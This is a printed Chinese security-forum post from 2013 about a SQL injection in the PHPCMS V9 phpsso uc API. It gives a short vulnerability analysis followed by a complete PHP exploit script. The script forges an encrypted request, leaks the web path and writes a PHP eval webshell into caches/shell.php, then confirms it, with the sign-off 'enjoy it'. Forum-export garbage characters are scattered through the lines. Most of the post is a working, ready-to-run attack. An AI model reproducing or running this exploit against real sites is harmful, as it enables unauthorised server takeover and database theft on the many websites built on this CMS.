中国网络渗透测试联盟

标题: PHPCMS V9 uc API SQL注入漏洞 [打印本页]

---

作者: admin    时间: 2013-2-9 01:22
标题: PHPCMS V9 uc API SQL注入漏洞
PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。

所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。
8 Z: H1 h* w- y- Y
9 A9 P; P( A2 g5 Q4 Y/ k5 n漏洞分析：
5 z" g5 |9 J5 k( y( r( [% N- v1.未启用ucenter服务的情况下uc_key为空
define('UC_KEY', pc_base::load_config('system', 'uc_key'));
0 D, F6 A! L% Y2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
- R8 n& A, D5 t7 M    public function deleteuser($get,$post) {
. y$ w, F9 f+ h/ N) g. e% m- B: X        pc_base::load_app_func('global', 'admin');
( N& Y, X' ^3 n+ a# y        pc_base::load_app_class('messagequeue', 'admin' , 0);
        $ids = new_stripslashes($get['ids']);
4 E' T+ y' `8 G* T* P        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
SQL语句为
SELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)

( q4 O' w3 o; N* M0 o利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
<?php
print_r('
3 [; i7 P! C, Z, s* C5 p---------------------------------------------------------------------------
3 [9 B- U; _9 `+ ~PHPcms (v9 or Old Version) uc api sql injection 0day
by rayh4c#80sec.com
---------------------------------------------------------------------------
');

if ($argc<3) {
: i  r7 j2 O4 V% V6 i- w    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
3 u+ g6 ]" v/ E" w+ q4 l% J! ]host:      target server (ip/hostname)
path:      path to phpcms
: w% `8 w" r# x0 |! J. gOptions:
-p[port]:    specify a port other than 80
" S* {/ s  Z4 S/ E1 v -P[ip:port]: specify a proxy
& o$ g; N! o# x! wExample:
" S# H& ~5 g/ T7 \# ?% dphp '.$argv[0].' localhost /
php '.$argv[0].' localhost /phpcms/ -p81
php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
$ T: R5 e6 Y0 P& d---------------------------------------------------------------------------
" R3 @3 t7 Y9 r; O: V: f');
  z4 E4 `# g9 S  A    die;
) i( e/ r) s: q& N) {+ T/ C  T( ~}
7 _7 `1 [1 ~5 o3 _/ G4 ]( s
* [7 H" q( U% `7 ^( a# U& Y  k- `error_reporting(7);
8 t  @: `' R7 l  o2 w- Z$ Iini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

/ w6 G% k7 d* \( p) Rfunction quick_dump($string)
3 m- K; h& X- J3 X( [{
; B, C' s+ Z' n7 K' d5 q8 x7 `  $result='';$exa='';$cont=0;
: ]$ u  W/ W& I' p% W8 Y% W  for ($i=0; $i<=strlen($string)-1; $i++)
7 M- }7 s2 c5 l% f' y0 C  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
5 u: M1 y# Q3 T! l1 l. N   {$result.="  .";}
( Z3 r# s3 r/ k9 n7 m' e, C0 N0 K   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
1 v. {# k! o8 s' N! p7 R   {$exa.=" 0".dechex(ord($string[$i]));}
- i% f! I. }0 T% g$ c; x6 }/ I% _# [   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
% a$ Y# w9 r+ c" \  }
return $exa."\r\n".$result;
}
- V& j- b" N+ a0 @$ D$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
; P# O1 ], m: ?
function send($packet)
9 Z! w4 Y& L. y; J# R3 W{
8 R0 N. d$ y% S$ v/ k" B, \! q  global $proxy, $host, $port, $html, $proxy_regex;
: p% z3 A9 w8 K% g' H  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
2 r  ?9 M2 b, A) t% X      echo 'No response from '.$host.':'.$port; die;
( P, y+ S- @* S: M4 f    }
% e% e* G2 \) D2 p! h; U3 L; t  }
  else {
        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
. d" N( P1 L( D8 V* W* s. j  W    }
    $parts=explode(':',$proxy);
: \4 H% F4 `1 c5 {2 n( X: h* q8 M) w    $parts[1]=(int)$parts[1];
- {6 V. o9 ~' m# b/ I7 u5 A( }    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
4 J& k3 F2 H$ _) y' I' h    if (!$ock) {
      echo 'No response from proxy...';die;
        }
8 _6 _, k) \  I+ a* h5 T  }
- ?1 N2 V: F8 t% Z. B  fputs($ock,$packet);
. o( n& ?' ^! ^2 A; C  if ($proxy=='') {
    $html='';
# I& B7 n+ y7 p3 o. ]  }    while (!feof($ock)) {
- k8 k3 B% P6 H+ n- t- e: p      $html.=fgets($ock);
    }
$ t) f: S. l. {. ]" q  }
, t; b, h5 {* e7 z; C  else {
, m3 s$ ~+ K# {8 ]' x* `    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
# ?* m1 z, ~2 ?/ h, Q      $html.=fread($ock,1);
; f$ x+ J- @  w: e    }
  }
; f5 d8 X+ k) C* Q# I  fclose($ock);
% t4 \( Z6 u2 R; x: ~2 M}
1 e8 p: N- U) H1 H
% k" n4 |; ^4 I/ c" o8 `$host=$argv[1];
$path=$argv[2];
. C  b! ?; f' Q' [! W* Q- B" |$port=80;
8 x  W! p, u; ~# s/ c  q$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
  H" _; h* S" d1 f# ], i( pif ($temp=="-p")
{
3 H! k) Z! c1 s: \+ P  $port=(int)str_replace("-p","",$argv[$i]);
' A1 G, w) {* M1 X3 ~9 d# J1 w}
. A4 g$ [0 m  Tif ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
9 i7 y( f! ^# l+ F: K, s}
/ C2 F* ^* X9 F# U) f
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

  K( R: o" ~' _. r5 a, Vfunction authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
+ j9 Z$ X  ]7 R  Y
3 M' I' M& a5 ?+ G4 E* t( F. `) B4 a    $ckey_length = 4;

    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
0 T4 L: y4 y, z& ^0 F( m
    $cryptkey = $keya.md5($keya.$keyc);
( m% |/ ]7 g0 b# |/ `    $key_length = strlen($cryptkey);

. \$ S; ?5 N& Y# a. }    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

    $rndkey = array();
8 c, t: j0 K/ ^    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
  f+ B0 A8 t* S0 h* n# l    }

. {0 O1 |( L& k8 f) v4 n! @    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
. V; ]3 f/ E% l' b* L- n8 r; N        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
. d% k4 q. s2 L7 M9 K1 J    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
0 c/ z" w; a" k$ {- C& v        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
! O1 V+ v, p. B! h$ A        $box[$a] = $box[$j];
6 r9 _& U% g6 z( b        $box[$j] = $tmp;
0 ^9 ?4 k- e- G3 [+ s  b7 `        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
8 \9 n4 N: Q1 @$ [    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
7 ?* }2 v; A' a" b        } else {
8 g! S9 l% x/ S+ V            return '';
) |9 K1 |4 n  Z9 \4 B/ B        }
    } else {
# e* N- O2 {" r7 [- n8 L        return $keyc.str_replace('=', '', base64_encode($result));
    }
, p+ T1 y: c) n% I- m3 U
}

! l6 ^' k, C( f/ q: x5 _4 F$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
7 g2 R4 J$ m0 v3 }echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
( N; D' J; V/ ~, J0 M$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
7 }1 m, P# E/ w$ P% ysend($packet);
if(strpos($html,"MySQL Errno") > 0){
! ?0 @$ D' }  c3 Recho "[2] 发现存在SQL注入漏洞"."\n";
+ a# T7 P6 E) P7 |9 Eecho "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
9 _0 d* z' z+ \- \1 C* }- }$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
( k+ H% L! |- {! `) `: [7 ?$packet.="Host: ".$host."\r\n";
- U5 |% L) o# x) `3 P' n% H$packet.="Connection: Close\r\n\r\n";
. U, [: U. h4 y2 E; L/ @; ]5 nsend($packet);
, M" D7 h# {2 J+ Vpreg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
# d  b  c. t7 D; b//print_r($matches);
) S3 u! U8 D0 }8 [: |4 |if(!empty($matches)){
echo "[4] 得到web路径 " . $matches[0]."\n";
0 |, k2 n! w: j; ^7 yecho "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
$SQL = "time=999999999999999999999999&ids=1)";
$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
$SQL.="&action=deleteuser";
" E" \# V2 z- O9 U  x0 K$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
, E2 ~% ~' S6 W/ b5 [" [$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
) g1 U! p$ F$ [! m% m$packet.="Connection: Close\r\n\r\n";
/ }  q# ]- V( }* u% ?& n" ^1 Wsend($packet);
# ~+ V1 `; W& [; [8 j% @if(strpos($html,"Access denied") > 0){
! N5 q+ }3 R4 [$ V5 ~- Kecho "[-] MYSQL权限过低 禁止写入文件 ";
die;
}
echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
5 |8 Z5 h3 ]1 y* H2 b5 {% w# L$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$ I0 Q9 i4 F9 P. a" _' V$packet.="Host: ".$host."\r\n";
3 [" F4 o2 }6 N; O" I1 V9 C$packet.="Connection: Close\r\n\r\n";
send($packet);
7 X" p/ U3 x  H% ]3 ?6 i% Oif(strpos($html,"<title>phpinfo()</title>") > 0){
8 G3 N/ T1 p# H( }* Z, eecho "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
! a+ s  {- K2 @5 Q}
7 v8 u3 Z- Q! N6 o0 s}else{
) {4 n5 b5 H- \$ ^9 H$ H3 Z6 F( oecho "[-]未取到web路径 ";
}
8 B& V" {1 C2 G- C  o8 A0 h% R}else{
9 V. i, [4 [: H2 ~% Xecho "[*]不存在SQL注入漏洞"."\n";
}
8 S. j+ U# g8 v( Q* u0 y! M" |
?>

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2